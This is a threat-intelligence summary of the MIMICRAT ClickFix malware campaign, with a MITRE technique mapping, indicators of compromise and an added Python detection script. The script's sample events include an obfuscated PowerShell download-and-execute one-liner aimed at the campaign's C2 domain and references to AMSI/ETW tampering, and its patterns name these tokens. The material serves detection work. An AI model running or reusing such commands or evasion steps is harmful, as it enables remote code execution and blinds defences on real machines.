Elastic Security Labs discovered a multi-stage ClickFix campaign that compromises legitimate websites to deliver a five-stage chain culminating in a custom native RAT called MIMICRAT. The attack uses an obfuscated PowerShell downloader with ETW and AMSI bypass, a Lua-based in-memory loader and Meterpreter-like shellcode, and a C++ implant with token impersonation and SOCKS5 tunneling. #MIMICRAT #ClickFix
Keypoints
- Attackers compromised multiple legitimate websites (bincheck.io and investonline.in) to host and deliver a ClickFix clipboard-based PowerShell lure that bypasses browser download protections.
- The delivery chain is five stages: obfuscated PowerShell downloader → ETW/AMSI bypass and payload drop → Lua-based in-memory loader → Meterpreter-like shellcode → MIMICRAT native RAT.
- Stage 2 implements runtime string construction and reflection-based patches to disable Event Tracing for Windows and AMSI, plus memory method-handle patching to evade detection.
- The Lua loader decrypts and executes embedded shellcode fully in memory, avoiding disk-based artifacts; the shellcode matched Meterpreter signatures and loads MIMICRAT reflectively.
- MIMICRAT is a bespoke MSVC x64 implant with malleable HTTP(S) C2 profiles, RC4/RSA/AES layered encryption, a 22-command dispatch table, token theft/impersonation, and SOCKS proxy support.
- Infrastructure clusters include initial payload delivery servers (45.13.212.250/251), post-exploitation C2 (23.227.202.114/www.ndibstersoft[.]com), and a CloudFront relay (d15mawx0xveem1.cloudfront[.]net).
MITRE Techniques
- [T1189] Drive-by Compromise – Compromised legitimate sites host malicious JavaScript used to deliver the ClickFix lure (‘compromising legitimate, trusted websites rather than attacker-owned infrastructure.’)
- [T1204] User Execution – Victims are social-engineered to paste and run a PowerShell command copied to the clipboard (‘the lure copies a malicious PowerShell command directly to the victim’s clipboard and prompts them to open a Run dialog … and paste it.’)
- [T1059.001] PowerShell – A compact obfuscated PowerShell one-liner and a second-stage PowerShell script are used as the primary downloader and evasion mechanism (‘The clipboard-delivered command is a compact and obfuscated PowerShell one-liner:’)
- [T1027] Obfuscated Files or Information – Strings and domains are constructed at runtime and mixed-case obfuscation is used to hide cmdlet names and C2 addresses (‘string slicing and arithmetic index operations on a single seed string … avoiding any plaintext representation of the C2 domain or PowerShell cmdlet names in the initial payload.’)
- [T1562.001] Impair Defenses: Disable or Modify Tools – The PowerShell script patches ETW and sets AMSI init to failed to disable logging and scanning (‘effectively disabling Event Tracing for Windows and blinding PowerShell script block logging.’; ‘sets the amsiInitFailed field to $true, causing PowerShell to skip all AMSI content scanning for the remainder of the session.’)
- [T1059] Command and Scripting Interpreter (Lua) – A statically embedded Lua interpreter decrypts and executes a Lua script that decodes and runs shellcode in memory (‘The decoded shellcode is then allocated in executable memory via luaalloc, copied into that memory with luacpy, and finally executed via luaexe, achieving fully in-memory, fileless shellcode execution.’)
- [T1055] Process Injection – The shellcode stage acts as a loader consistent with Meterpreter to reflectively load the final RAT into memory (‘Shellcode matched Meterpreter-related signatures, suggesting the shellcode stage is a loader consistent with the Meterpreter code-family to reflectively load MIMICRAT into memory.’)
- [T1071.001] Application Layer Protocol: Web Protocols – MIMICRAT communicates over HTTPS on port 443 using HTTP profiles that mimic legitimate analytics traffic (‘The final implant communicates over HTTPS on port 443 using HTTP profiles that resemble legitimate web analytics traffic.’)
- [T1041] Exfiltration Over C2 Channel – The implant uses HTTP POST profiles for data exfiltration (‘HTTP POST Profile: Data Exfiltration’)
- [T1134.001] Access Token Manipulation: Token Impersonation/Theft – MIMICRAT implements token duplication and impersonation for privilege abuse and launching processes (‘Steal token: Duplicates the security token of a target process by PID’; ‘Spawn process: Launches a process using a stolen token if available’)
- [T1090] Proxy – The implant supports SOCKS proxy tunneling to route traffic through compromised hosts (‘SOCKS5 tunneling’ and command entries for SOCKS configuration and proxying)
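Detection logic for the initial-access and evasion techniques listed above (T1204, T1027, T1562.001), run over constructed process-creation events; this is an added example, not code from Elastic Security Labs or the report, and the sample command lines, field names and thresholds are assumptions built from the behaviours the summary describes.

```python
import re

# Constructed process-creation telemetry (parent image, image, command line).
# Illustrative samples only; they are not events from the original report.
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe",
     "powershell -w h -c $s='xMRi.neTwOrk/p';iEx(iwr ('htt'+'ps://'+$s.SubString(0,12)))"),
    ("powershell.exe", "powershell.exe",
     "powershell -nop -c $a='amsiInitFailed';$e='EtwEventWrite';# ...rest omitted"),
    ("cmd.exe", "powershell.exe", "powershell -File C:\\scripts\\backup.ps1"),
]

# Indicators derived from the behaviours the report describes.
TAMPER_TOKENS = ("amsiInitFailed", "AmsiUtils", "EtwEventWrite")
DOMAIN_RE = re.compile(r"(?<![\w.$])(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}(?![\w.])")
CMDLET_RE = re.compile(r"\b(iex|iwr|irm|invoke-expression)\b", re.IGNORECASE)
SLICE_RE = re.compile(r"\.substring\(|\[char\]|-join", re.IGNORECASE)


def is_mixed_case(token: str) -> bool:
    """True when a token mixes upper and lower case letters (e.g. xMRi.neTwOrk)."""
    letters = [c for c in token if c.isalpha()]
    return any(c.isupper() for c in letters) and any(c.islower() for c in letters)


def analyze_event(parent: str, image: str, cmdline: str) -> list:
    """Return the ClickFix / evasion indicators found in a single event."""
    findings = []
    # Run-dialog execution shows up as PowerShell parented by explorer.exe.
    if image.lower() == "powershell.exe" and parent.lower() == "explorer.exe":
        findings.append("T1204: PowerShell spawned by explorer.exe (Run dialog / ClickFix pattern)")
    if any(is_mixed_case(m.group(0)) for m in DOMAIN_RE.finditer(cmdline)):
        findings.append("T1027: mixed-case host name (obfuscated C2 domain)")
    if any(is_mixed_case(m.group(0)) for m in CMDLET_RE.finditer(cmdline)):
        findings.append("T1027: mixed-case download/execute cmdlet alias")
    if SLICE_RE.search(cmdline):
        findings.append("T1027: runtime string construction (slicing / char arithmetic)")
    if any(t.lower() in cmdline.lower() for t in TAMPER_TOKENS):
        findings.append("T1562.001: AMSI/ETW tampering reference in command line")
    return findings


def scan_events(events) -> dict:
    """Map each command line to its findings, keeping only events that hit."""
    return {c: f for p, i, c in events if (f := analyze_event(p, i, c))}
```

The explorer.exe parent check is the highest-value signal here because a clipboard-pasted Run-dialog command rarely carries a legitimate script path.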
Indicators of Compromise
- [SHA-256] sample binaries and stages – a508d0bb583dc6e5f97b6094f8f910b5b6f2b9d5528c04e4dee62c343fce6f4b (MIMICRAT), bcc7a0e53ebc62c77b7b6e3585166bfd7164f65a8115e7c8bda568279ab4f6f1 (Stage 1 PowerShell), and 2 more hashes
- [IP Address] delivery and C2 infrastructure – 45.13.212.250, 45.13.212.251 (payload delivery cluster), and 23.227.202.114 (post-exploitation C2)
- [Domain] C2 and relay hosts – d15mawx0xveem1.cloudfront[.]net (CloudFront C2 relay), xmri.network / xMRi.neTwOrk (stage 1 C2/payload delivery), and other associated domains (wexmri.cc, www.ndibstersoft[.]com)
- [URL] malicious script and payload archive – https://www.investonline[.]in/js/jq.php (hosted ClickFix JavaScript payload), backupdailyawss.s3.us-east-1.amazonaws[.]com/rgen.zip (payload delivery archive)
- [File Name] dropped artifacts – zbuild.exe (dropped binary / Lua loader), rgen.zip (embedded payload archive)
Read more: https://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks